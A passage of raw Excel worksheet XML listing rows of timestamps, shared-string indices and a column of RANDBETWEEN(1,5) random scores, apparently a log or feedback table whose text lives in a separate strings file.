        <f t="shared" ref="F21122:F21185" ca="1" si="330">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="21123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21123" s="1">
        <v>43088.482071759259</v>
      </c>
      <c r="C21123" t="s">
        <v>10</v>
      </c>
      <c r="D21123" t="s">
        <v>263</v>
      </c>
      <c r="E21123" t="s">
        <v>19027</v>
      </c>
      <c r="F21123">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21124" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A21124" s="1">
        <v>43088.470833333333</v>
      </c>
      <c r="C21124" t="s">
        <v>10</v>
      </c>
      <c r="D21124" t="s">
        <v>86</v>
      </c>
      <c r="E21124" s="2" t="s">
        <v>19028</v>
      </c>
      <c r="F21124">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21125" s="1">
        <v>43088.467129629629</v>
      </c>
      <c r="C21125" t="s">
        <v>6</v>
      </c>
      <c r="D21125" t="s">
        <v>602</v>
      </c>
      <c r="E21125" t="s">
        <v>19029</v>
      </c>
      <c r="F21125">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21126" s="1">
        <v>43088.426423611112</v>
      </c>
      <c r="C21126" t="s">
        <v>10</v>
      </c>
      <c r="D21126" t="s">
        <v>158</v>
      </c>
      <c r="E21126" t="s">
        <v>19030</v>
      </c>
      <c r="F21126">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21127" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21127" s="1">
        <v>43088.416898148149</v>
      </c>
      <c r="C21127" t="s">
        <v>10</v>
      </c>
      <c r="D21127" t="s">
        <v>6</v>
      </c>
      <c r="E21127" s="2" t="s">
        <v>19031</v>
      </c>
      <c r="F21127">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21128" s="1">
        <v>43088.404016203705</v>
      </c>
      <c r="C21128" t="s">
        <v>139</v>
      </c>
      <c r="D21128" t="s">
        <v>312</v>
      </c>
      <c r="E21128" t="s">
        <v>19032</v>
      </c>
      <c r="F21128">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21129" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21129" s="1">
        <v>43088.403009259258</v>
      </c>
      <c r="C21129" t="s">
        <v>71</v>
      </c>
      <c r="E21129" s="2" t="s">
        <v>19033</v>
      </c>
      <c r="F21129">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21130" s="1">
        <v>43088.368379629632</v>
      </c>
      <c r="C21130" t="s">
        <v>124</v>
      </c>
      <c r="E21130" t="s">
        <v>19034</v>
      </c>
      <c r="F21130">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21131" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21131" s="1">
        <v>43088.356863425928</v>
      </c>
      <c r="C21131" t="s">
        <v>41</v>
      </c>
      <c r="E21131" t="s">
        <v>19035</v>
      </c>
      <c r="F21131">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21132" s="1">
        <v>43088.341747685183</v>
      </c>
      <c r="C21132" t="s">
        <v>41</v>
      </c>
      <c r="E21132" t="s">
        <v>19036</v>
      </c>
      <c r="F21132">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21133" s="1">
        <v>43088.313923611109</v>
      </c>
      <c r="C21133" t="s">
        <v>10</v>
      </c>
      <c r="D21133" t="s">
        <v>36</v>
      </c>
      <c r="E21133" t="s">
        <v>19037</v>
      </c>
      <c r="F21133">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21134" s="1">
        <v>43088.277812499997</v>
      </c>
      <c r="C21134" t="s">
        <v>139</v>
      </c>
      <c r="D21134" t="s">
        <v>312</v>
      </c>
      <c r="E21134" t="s">
        <v>19038</v>
      </c>
      <c r="F21134">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21135" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21135" s="1">
        <v>43088.253113425926</v>
      </c>
      <c r="C21135" t="s">
        <v>134</v>
      </c>
      <c r="E21135" s="2" t="s">
        <v>19039</v>
      </c>
      <c r="F21135">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21136" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21136" s="1">
        <v>43088.240219907406</v>
      </c>
      <c r="C21136" t="s">
        <v>124</v>
      </c>
      <c r="E21136" s="2" t="s">
        <v>19040</v>
      </c>
      <c r="F21136">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21137" s="1">
        <v>43088.220057870371</v>
      </c>
      <c r="C21137" t="s">
        <v>41</v>
      </c>
      <c r="E21137" t="s">
        <v>19041</v>
      </c>
      <c r="F21137">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21138" s="1">
        <v>43088.113888888889</v>
      </c>
      <c r="C21138" t="s">
        <v>50</v>
      </c>
      <c r="E21138" t="s">
        <v>19042</v>
      </c>
      <c r="F21138">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21139" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21139" s="1">
        <v>43088.094641203701</v>
      </c>
      <c r="C21139" t="s">
        <v>173</v>
      </c>
      <c r="E21139" s="2" t="s">
        <v>19043</v>
      </c>
      <c r="F21139">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21140" s="1">
        <v>43088.057974537034</v>
      </c>
      <c r="C21140" t="s">
        <v>41</v>
      </c>
      <c r="F21140">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21141" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21141" s="1">
        <v>43087.973796296297</v>
      </c>
      <c r="C21141" t="s">
        <v>73</v>
      </c>
      <c r="E21141" s="2" t="s">
        <v>19044</v>
      </c>
      <c r="F21141">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21142" s="1">
        <v>43087.833379629628</v>
      </c>
      <c r="C21142" t="s">
        <v>10</v>
      </c>
      <c r="D21142" t="s">
        <v>92</v>
      </c>
      <c r="E21142" t="s">
        <v>19045</v>
      </c>
      <c r="F21142">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21143" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21143" s="1">
        <v>43087.80537037037</v>
      </c>
      <c r="C21143" t="s">
        <v>10</v>
      </c>
      <c r="D21143" t="s">
        <v>6</v>
      </c>
      <c r="E21143" s="2" t="s">
        <v>19046</v>
      </c>
      <c r="F21143">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21144" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21144" s="1">
        <v>43087.769178240742</v>
      </c>
      <c r="C21144" t="s">
        <v>10</v>
      </c>
      <c r="D21144" t="s">
        <v>20</v>
      </c>
      <c r="E21144" s="2" t="s">
        <v>19047</v>
      </c>
      <c r="F21144">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21145" s="1">
        <v>43087.755057870374</v>
      </c>
      <c r="C21145" t="s">
        <v>6</v>
      </c>
      <c r="D21145" t="s">
        <v>114</v>
      </c>
      <c r="E21145" t="s">
        <v>19048</v>
      </c>
      <c r="F21145">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21146" s="1">
        <v>43087.706666666665</v>
      </c>
      <c r="C21146" t="s">
        <v>10</v>
      </c>
      <c r="D21146" t="s">
        <v>46</v>
      </c>
      <c r="E21146" t="s">
        <v>19049</v>
      </c>
      <c r="F21146">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21147" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21147" s="1">
        <v>43087.706018518518</v>
      </c>
      <c r="C21147" t="s">
        <v>10</v>
      </c>
      <c r="D21147" t="s">
        <v>23</v>
      </c>
      <c r="E21147" s="2" t="s">
        <v>19050</v>
      </c>
      <c r="F21147">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21148" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21148" s="1">
        <v>43087.602870370371</v>
      </c>
      <c r="C21148" t="s">
        <v>10</v>
      </c>
      <c r="D21148" t="s">
        <v>112</v>
      </c>
      <c r="E21148" s="2" t="s">
        <v>19051</v>
      </c>
      <c r="F21148">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21149" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A21149" s="1">
        <v>43087.584999999999</v>
      </c>
      <c r="C21149" t="s">
        <v>10</v>
      </c>
      <c r="D21149" t="s">
        <v>178</v>
      </c>
      <c r="E21149" s="2" t="s">
        <v>19052</v>
      </c>
      <c r="F21149">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21150" s="1">
        <v>43087.569467592592</v>
      </c>
      <c r="C21150" t="s">
        <v>29</v>
      </c>
      <c r="F21150">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21151" s="1">
        <v>43087.542060185187</v>
      </c>
      <c r="C21151" t="s">
        <v>10</v>
      </c>
      <c r="D21151" t="s">
        <v>107</v>
      </c>
      <c r="E21151" t="s">
        <v>19053</v>
      </c>
      <c r="F21151">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21152" s="1">
        <v>43087.500115740739</v>
      </c>
      <c r="C21152" t="s">
        <v>10</v>
      </c>
      <c r="D21152" t="s">
        <v>6</v>
      </c>
      <c r="E21152" t="s">
        <v>19054</v>
      </c>
      <c r="F21152">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21153" s="1">
        <v>43087.476967592593</v>
      </c>
      <c r="C21153" t="s">
        <v>10</v>
      </c>
      <c r="D21153" t="s">
        <v>158</v>
      </c>
      <c r="E21153" t="s">
        <v>19055</v>
      </c>
      <c r="F21153">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21154" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21154" s="1">
        <v>43087.467731481483</v>
      </c>
      <c r="C21154" t="s">
        <v>65</v>
      </c>
      <c r="E21154" s="2" t="s">
        <v>19056</v>
      </c>
      <c r="F21154">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21155" s="1">
        <v>43087.458611111113</v>
      </c>
      <c r="C21155" t="s">
        <v>10</v>
      </c>
      <c r="D21155" t="s">
        <v>163</v>
      </c>
      <c r="E21155" t="s">
        <v>19057</v>
      </c>
      <c r="F21155">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21156" s="1">
        <v>43087.436157407406</v>
      </c>
      <c r="C21156" t="s">
        <v>10</v>
      </c>
      <c r="D21156" t="s">
        <v>271</v>
      </c>
      <c r="E21156" t="s">
        <v>19058</v>
      </c>
      <c r="F21156">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21157" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21157" s="1">
        <v>43087.426817129628</v>
      </c>
      <c r="C21157" t="s">
        <v>48</v>
      </c>
      <c r="E21157" s="2" t="s">
        <v>19059</v>
      </c>
      <c r="F21157">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21158" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21158" s="1">
        <v>43087.426076388889</v>
      </c>
      <c r="C21158" t="s">
        <v>6</v>
      </c>
      <c r="D21158" t="s">
        <v>25</v>
      </c>
      <c r="E21158" s="2" t="s">
        <v>19060</v>
      </c>
      <c r="F21158">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21159" s="1">
        <v>43087.416956018518</v>
      </c>
      <c r="C21159" t="s">
        <v>50</v>
      </c>
      <c r="E21159" t="s">
        <v>19061</v>
      </c>
      <c r="F21159">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21160" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21160" s="1">
        <v>43087.399456018517</v>
      </c>
      <c r="C21160" t="s">
        <v>344</v>
      </c>
      <c r="F21160">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21161" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21161" s="1">
        <v>43087.389386574076</v>
      </c>
      <c r="C21161" t="s">
        <v>454</v>
      </c>
      <c r="D21161" t="s">
        <v>41</v>
      </c>
      <c r="E21161" s="2" t="s">
        <v>19062</v>
      </c>
      <c r="F21161">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21162" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21162" s="1">
        <v>43087.370659722219</v>
      </c>
      <c r="C21162" t="s">
        <v>10</v>
      </c>
      <c r="D21162" t="s">
        <v>41</v>
      </c>
      <c r="E21162" s="2" t="s">
        <v>19063</v>
      </c>
      <c r="F21162">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21163" s="1">
        <v>43087.360983796294</v>
      </c>
      <c r="C21163" t="s">
        <v>10</v>
      </c>
      <c r="D21163" t="s">
        <v>158</v>
      </c>
      <c r="E21163" t="s">
        <v>19064</v>
      </c>
      <c r="F21163">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21164" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A21164" s="1">
        <v>43087.322604166664</v>
      </c>
      <c r="C21164" t="s">
        <v>43</v>
      </c>
      <c r="E21164" s="2" t="s">
        <v>19065</v>
      </c>
      <c r="F21164">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21165" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21165" s="1">
        <v>43087.31045138889</v>
      </c>
      <c r="C21165" t="s">
        <v>430</v>
      </c>
      <c r="E21165" s="2" t="s">
        <v>19066</v>
      </c>
      <c r="F21165">
        <f t="shared" ca="1" si="330"/>
        <v>4</v>
      </c>
    </row>
    <row r="21166" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21166" s="1">
        <v>43087.274525462963</v>
      </c>
      <c r="C21166" t="s">
        <v>48</v>
      </c>
      <c r="E21166" t="s">
        <v>19067</v>
      </c>
      <c r="F21166">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21167" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21167" s="1">
        <v>43087.245625000003</v>
      </c>
      <c r="C21167" t="s">
        <v>69</v>
      </c>
      <c r="E21167" s="2" t="s">
        <v>19068</v>
      </c>
      <c r="F21167">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21168" s="1">
        <v>43087.218993055554</v>
      </c>
      <c r="C21168" t="s">
        <v>3443</v>
      </c>
      <c r="D21168" t="s">
        <v>312</v>
      </c>
      <c r="E21168" t="s">
        <v>19069</v>
      </c>
      <c r="F21168">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21169" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A21169" s="1">
        <v>43087.210810185185</v>
      </c>
      <c r="C21169" t="s">
        <v>454</v>
      </c>
      <c r="E21169" s="2" t="s">
        <v>19070</v>
      </c>
      <c r="F21169">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21170" s="1">
        <v>43087.18310185185</v>
      </c>
      <c r="C21170" t="s">
        <v>41</v>
      </c>
      <c r="E21170" t="s">
        <v>19071</v>
      </c>
      <c r="F21170">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21171" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A21171" s="1">
        <v>43087.124479166669</v>
      </c>
      <c r="C21171" t="s">
        <v>124</v>
      </c>
      <c r="E21171" s="2" t="s">
        <v>19072</v>
      </c>
      <c r="F21171">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21172" s="1">
        <v>43087.092777777776</v>
      </c>
      <c r="C21172" t="s">
        <v>60</v>
      </c>
      <c r="E21172" t="s">
        <v>19073</v>
      </c>
      <c r="F21172">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21173" s="1">
        <v>43087.092766203707</v>
      </c>
      <c r="C21173" t="s">
        <v>60</v>
      </c>
      <c r="E21173" t="s">
        <v>19073</v>
      </c>
      <c r="F21173">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21174" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21174" s="1">
        <v>43087.045578703706</v>
      </c>
      <c r="C21174" t="s">
        <v>1050</v>
      </c>
      <c r="E21174" s="2" t="s">
        <v>19074</v>
      </c>
      <c r="F21174">
        <f t="shared" ca="1" si="330"/>
        <v>2</v>
      </c>
    </row>
    <row r="21175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21175" s="1">
        <v>43086.93109953704</v>
      </c>
      <c r="C21175" t="s">
        <v>139</v>
      </c>
      <c r="F21175">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21176" s="1">
        <v>43086.703969907408</v>
      </c>
      <c r="C21176" t="s">
        <v>10</v>
      </c>
      <c r="D21176" t="s">
        <v>494</v>
      </c>
      <c r="E21176" t="s">
        <v>19075</v>
      </c>
      <c r="F21176">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21177" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21177" s="1">
        <v>43086.505219907405</v>
      </c>
      <c r="C21177" t="s">
        <v>166</v>
      </c>
      <c r="E21177" s="2" t="s">
        <v>19076</v>
      </c>
      <c r="F21177">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21178" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21178" s="1">
        <v>43086.427581018521</v>
      </c>
      <c r="C21178" t="s">
        <v>48</v>
      </c>
      <c r="E21178" s="2" t="s">
        <v>19077</v>
      </c>
      <c r="F21178">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21179" s="1">
        <v>43085.906608796293</v>
      </c>
      <c r="C21179" t="s">
        <v>454</v>
      </c>
      <c r="D21179" t="s">
        <v>20</v>
      </c>
      <c r="E21179" t="s">
        <v>19078</v>
      </c>
      <c r="F21179">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21180" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21180" s="1">
        <v>43085.700092592589</v>
      </c>
      <c r="C21180" t="s">
        <v>2082</v>
      </c>
      <c r="D21180" t="s">
        <v>94</v>
      </c>
      <c r="E21180" s="2" t="s">
        <v>19079</v>
      </c>
      <c r="F21180">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21181" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21181" s="1">
        <v>43085.567314814813</v>
      </c>
      <c r="C21181" t="s">
        <v>10</v>
      </c>
      <c r="D21181" t="s">
        <v>251</v>
      </c>
      <c r="E21181" s="2" t="s">
        <v>19080</v>
      </c>
      <c r="F21181">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21182" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21182" s="1">
        <v>43085.563969907409</v>
      </c>
      <c r="C21182" t="s">
        <v>10</v>
      </c>
      <c r="D21182" t="s">
        <v>36</v>
      </c>
      <c r="E21182" s="2" t="s">
        <v>19081</v>
      </c>
      <c r="F21182">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21183" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21183" s="1">
        <v>43085.398761574077</v>
      </c>
      <c r="C21183" t="s">
        <v>318</v>
      </c>
      <c r="D21183" t="s">
        <v>33</v>
      </c>
      <c r="E21183" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21183">
        <f t="shared" ca="1" si="330"/>
        <v>5</v>
      </c>
    </row>
    <row r="21184" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21184" s="1">
        <v>43085.353067129632</v>
      </c>
      <c r="C21184" t="s">
        <v>318</v>
      </c>
      <c r="D21184" t="s">
        <v>374</v>
      </c>
      <c r="E21184" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21184">
        <f t="shared" ca="1" si="330"/>
        <v>3</v>
      </c>
    </row>
    <row r="21185" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21185" s="1">
        <v>43085.322812500002</v>
      </c>
      <c r="C21185" t="s">
        <v>318</v>
      </c>
      <c r="D21185" t="s">
        <v>1036</v>
      </c>
      <c r="E21185" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="F21185">
        <f t="shared" ca="1" si="330"/>
        <v>1</v>
      </c>
    </row>
    <row r="21186" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21186" s="1">
        <v>43085.317719907405</v>
      </c>
      <c r="C21186" t="s">
        <v>865</v>
      </c>
      <c r="E21186" s="2" t="s">
        <v>19082</v>
      </c>
      <c r="F21186">
        <f t="shared" ref="F21186:F21249" ca="1" si="331">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21187" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21187" s="1">
        <v>43085.300578703704</v>
      </c>
      <c r="C21187" t="s">
        <v>10</v>
      </c>
      <c r="D21187" t="s">
        <v>89</v>
      </c>
      <c r="E21187" s="2" t="s">
        <v>19083</v>
      </c>
      <c r="F21187">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21188" s="1">
        <v>43085.287453703706</v>
      </c>
      <c r="C21188" t="s">
        <v>686</v>
      </c>
      <c r="E21188" t="s">
        <v>19084</v>
      </c>
      <c r="F21188">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21189" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21189" s="1">
        <v>43085.280763888892</v>
      </c>
      <c r="C21189" t="s">
        <v>454</v>
      </c>
      <c r="D21189" t="s">
        <v>312</v>
      </c>
      <c r="E21189" s="2" t="s">
        <v>19085</v>
      </c>
      <c r="F21189">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21190" s="1">
        <v>43085.164953703701</v>
      </c>
      <c r="C21190" t="s">
        <v>41</v>
      </c>
      <c r="F21190">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21191" s="1">
        <v>43085.164502314816</v>
      </c>
      <c r="C21191" t="s">
        <v>41</v>
      </c>
      <c r="E21191" t="s">
        <v>3499</v>
      </c>
      <c r="F21191">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21192" s="1">
        <v>43085.076851851853</v>
      </c>
      <c r="C21192" t="s">
        <v>41</v>
      </c>
      <c r="E21192" t="s">
        <v>19086</v>
      </c>
      <c r="F21192">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21193" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21193" s="1">
        <v>43084.872893518521</v>
      </c>
      <c r="C21193" t="s">
        <v>4852</v>
      </c>
      <c r="D21193" t="s">
        <v>194</v>
      </c>
      <c r="E21193" s="2" t="s">
        <v>19087</v>
      </c>
      <c r="F21193">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21194" s="1">
        <v>43084.767361111109</v>
      </c>
      <c r="C21194" t="s">
        <v>4852</v>
      </c>
      <c r="E21194" t="s">
        <v>19088</v>
      </c>
      <c r="F21194">
        <f t="shared" ca="1" si="331"/>
        <v>3</v>
      </c>
    </row>
    <row r="21195" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21195" s="1">
        <v>43084.767002314817</v>
      </c>
      <c r="C21195" t="s">
        <v>4852</v>
      </c>
      <c r="E21195" t="s">
        <v>19089</v>
      </c>
      <c r="F21195">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21196" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21196" s="1">
        <v>43084.725902777776</v>
      </c>
      <c r="C21196" t="s">
        <v>10</v>
      </c>
      <c r="D21196" t="s">
        <v>92</v>
      </c>
      <c r="E21196" s="2" t="s">
        <v>19090</v>
      </c>
      <c r="F21196">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21197" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21197" s="1">
        <v>43084.720532407409</v>
      </c>
      <c r="C21197" t="s">
        <v>10</v>
      </c>
      <c r="D21197" t="s">
        <v>46</v>
      </c>
      <c r="E21197" s="2" t="s">
        <v>19091</v>
      </c>
      <c r="F21197">
        <f t="shared" ca="1" si="331"/>
        <v>5</v>
      </c>
    </row>
    <row r="21198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21198" s="1">
        <v>43084.677951388891</v>
      </c>
      <c r="C21198" t="s">
        <v>10</v>
      </c>
      <c r="D21198" t="s">
        <v>163</v>
      </c>
      <c r="E21198" t="s">
        <v>19092</v>
      </c>
      <c r="F21198">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21199" s="1">
        <v>43084.648506944446</v>
      </c>
      <c r="C21199" t="s">
        <v>10</v>
      </c>
      <c r="D21199" t="s">
        <v>89</v>
      </c>
      <c r="E21199" t="s">
        <v>19093</v>
      </c>
      <c r="F21199">
        <f t="shared" ca="1" si="331"/>
        <v>1</v>
      </c>
    </row>
    <row r="21200" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A21200" s="1">
        <v>43084.647060185183</v>
      </c>
      <c r="C21200" t="s">
        <v>10</v>
      </c>
      <c r="D21200" t="s">
        <v>89</v>
      </c>
      <c r="E21200" s="2" t="s">
        <v>19094</v>
      </c>
      <c r="F21200">
        <f t="shared" ca="1" si="331"/>
        <v>2</v>
      </c>
    </row>
    <row r="21201" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21201" s="1">
        <v>43084.576273148145</v>
      </c>
      <c r="C21201" t="s">
        <v>10</v>
      </c>
      <c r="D21201" t="s">
        <v>89</v>
      </c>
      <c r="E21201" s="2" t="s">
        <v>19095</v>
      </c>
      <c r="F21201">
        <f t="shared" ca="1" si="331"/>
